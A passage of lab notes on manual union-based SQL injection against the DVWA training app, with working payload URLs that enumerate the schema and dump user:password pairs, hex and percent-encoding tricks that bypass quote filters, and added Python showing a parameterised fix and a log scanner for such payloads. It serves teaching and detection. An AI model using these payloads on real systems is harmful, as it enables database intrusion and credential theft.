- Note that the injection point is string-typed (the value sits inside single quotes). `order by 3` fails while `order by 2` works, which shows the query returns two columns.
- Find the database names. Note the difference between `group_concat` and `concat`: `concat` produces one output row per matching row, while `group_concat` aggregates all of them into a single result.
http://192.168.167.207/dvwa/vulnerabilities/sqli/?id=1 ' union select 1,group_concat(schema_name) from information_schema.schemata-- &Submit=Submit#
Or use `database()`:
http://192.168.167.207/dvwa/vulnerabilities/sqli/?id=1 ' union select 1,group_concat(database()) -- &Submit=Submit#
- Find the tables
http://192.168.167.207/dvwa/vulnerabilities/sqli/?id=1 ' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa' -- &Submit=Submit#
- Find the columns
http://192.168.167.207/dvwa/vulnerabilities/sqli/?id=1 ' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' -- &Submit=Submit#
- Read the data
`0x3a` is used in place of `':'` as the separator.
http://192.168.167.207/dvwa/vulnerabilities/sqli/?id=1%27%20union select 1,group_concat(user,0x3a,password) from users -- &Submit=Submit
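As an added example (not DVWA's own code and not from the referenced post), the query shape that makes the steps above work, next to its parameterised form. SQLite stands in for MySQL, the `users` table and password hashes are constructed placeholders, and the union payload is the page's data-extraction payload rewritten with SQLite's `||` concatenation instead of `group_concat(user,0x3a,password)`:

```python
import sqlite3

# Constructed sample table: placeholder names and password hashes, not DVWA's data.
# SQLite stands in for MySQL; the quoting bug is identical, only the string
# concatenation syntax differs (MySQL group_concat(user,0x3a,password) becomes
# SQLite group_concat(user || ':' || password)).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT,
                            user TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'Ada', 'Lovelace', 'ada', 'PLACEHOLDER_HASH_1');
        INSERT INTO users VALUES (2, 'Bob', 'Builder',  'bob', 'PLACEHOLDER_HASH_2');
    """)
    return conn

def lookup_vulnerable(conn, user_id):
    # Same shape as DVWA's low-security query: the parameter is pasted into a
    # single-quoted literal, so a quote in the input closes that literal and
    # everything after it is parsed as SQL.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '" + user_id + "'"
    return conn.execute(sql).fetchall()

def lookup_hardened(conn, user_id):
    # Parameterised query: the value travels separately from the SQL text, so
    # it is only ever compared as data and never parsed as SQL.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()

# The page's data-extraction payload in SQLite syntax. The trailing '-- '
# comments out the closing quote the application appends.
UNION_PAYLOAD = "1' union select 1, group_concat(user || ':' || password) from users -- "

def demo():
    conn = make_db()
    return {
        "benign_vulnerable":  lookup_vulnerable(conn, "1"),
        "benign_hardened":    lookup_hardened(conn, "1"),
        "payload_vulnerable": lookup_vulnerable(conn, UNION_PAYLOAD),
        "payload_hardened":   lookup_hardened(conn, UNION_PAYLOAD),
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

With the benign input both functions return the same single row. With the payload, the concatenated version returns an extra row carrying every `user:password` pair, while the parameterised version returns nothing, because the whole payload is compared as a literal `user_id` value.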
- Notes

| | select ? | from ? | where ? |
|---|---|---|---|
| Database names | schema_name | information_schema.schemata | |
| Table names | table_name | information_schema.tables | table_schema |
| Column names | column_name | information_schema.columns | table_name |
- Encoding tricks
The original condition is `table_name = 'users'`. If single quotes are filtered, `users` can be written as hexadecimal with a `0x` prefix and the query then needs no quotes at all:
http://192.168.167.207/dvwa/vulnerabilities/sqli/?id=1%27%20union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 -- &Submit=Submit
Or alternatively `table_name='%75%73%65%72%73'`.
Reference: https://tipstrickshack.blogspot.com/2012/11/how-to-do-sql-injection-manually_7948.html
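The encoding tricks above are the reason a filter that only looks for a literal single quote is not a defence. As an added example (not from the page or the referenced post), here is detection logic that normalises a request line the way the application and database will see it, percent-decoding it and expanding MySQL-style `0x…` literals, before matching union-select and `information_schema` patterns. The request lines are constructed from the URLs in this note, not real traffic:

```python
import re
from urllib.parse import unquote_plus

# Constructed request lines modelled on the URLs in this note (lab host, not
# real traffic), as the path and query string would appear in an access log.
SAMPLE_REQUESTS = [
    "/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit",
    "/dvwa/vulnerabilities/sqli/?id=1%27%20union%20select%201,group_concat(column_name)"
    "%20from%20information_schema.columns%20where%20table_name=0x7573657273%20--%20&Submit=Submit",
    "/dvwa/vulnerabilities/sqli/?id=1%27%20union%20select%201,group_concat(column_name)"
    "%20from%20information_schema.columns%20where%20table_name=%27%75%73%65%72%73%27%20--%20&Submit=Submit",
    "/dvwa/vulnerabilities/sqli/?id=1%27%20union%20select%201,group_concat(user,0x3a,password)"
    "%20from%20users%20--%20&Submit=Submit",
    "/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit",
]

# MySQL reads 0x7573657273 as the string 'users' and 0x3a as ':'.
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-fA-F]{2})+)\b")

def decode_hex_literals(s):
    # Expand 0x... literals so a quote-free payload is inspected by the same
    # rules as a quoted one; non-ASCII bytes are left as the original literal.
    def repl(m):
        try:
            return bytes.fromhex(m.group(1)).decode("ascii")
        except UnicodeDecodeError:
            return m.group(0)
    return HEX_LITERAL.sub(repl, s)

def normalize(request_line):
    # Percent-decode twice (so a double-encoded payload also surfaces), which
    # turns '%75%73%65%72%73' back into 'users' just as the web server does;
    # then expand hex literals and lowercase so one rule set covers all spellings.
    decoded = unquote_plus(unquote_plus(request_line))
    return decode_hex_literals(decoded).lower()

UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b")
SCHEMA_ENUM = re.compile(r"\binformation_schema\.(?:schemata|tables|columns)\b")

def classify(request_line):
    # Return the list of rule names that fire for one request line.
    n = normalize(request_line)
    findings = []
    if UNION_SELECT.search(n):
        findings.append("union-select")
    if SCHEMA_ENUM.search(n):
        findings.append("information_schema-enumeration")
    if HEX_LITERAL.search(unquote_plus(unquote_plus(request_line))):
        findings.append("hex-encoded-string-literal")
    return findings

def scan(lines):
    # Map each flagged request to its findings; benign lines are omitted.
    flagged = {}
    for line in lines:
        findings = classify(line)
        if findings:
            flagged[line] = findings
    return flagged

if __name__ == "__main__":
    for line, findings in scan(SAMPLE_REQUESTS).items():
        print(findings, line)
```

Matching before normalisation would miss the `0x7573657273` form entirely and would see `%27` rather than a quote; matching after it flags all three encoded variants with the same two rules, and the hex rule additionally records that a string literal was smuggled in without quotes.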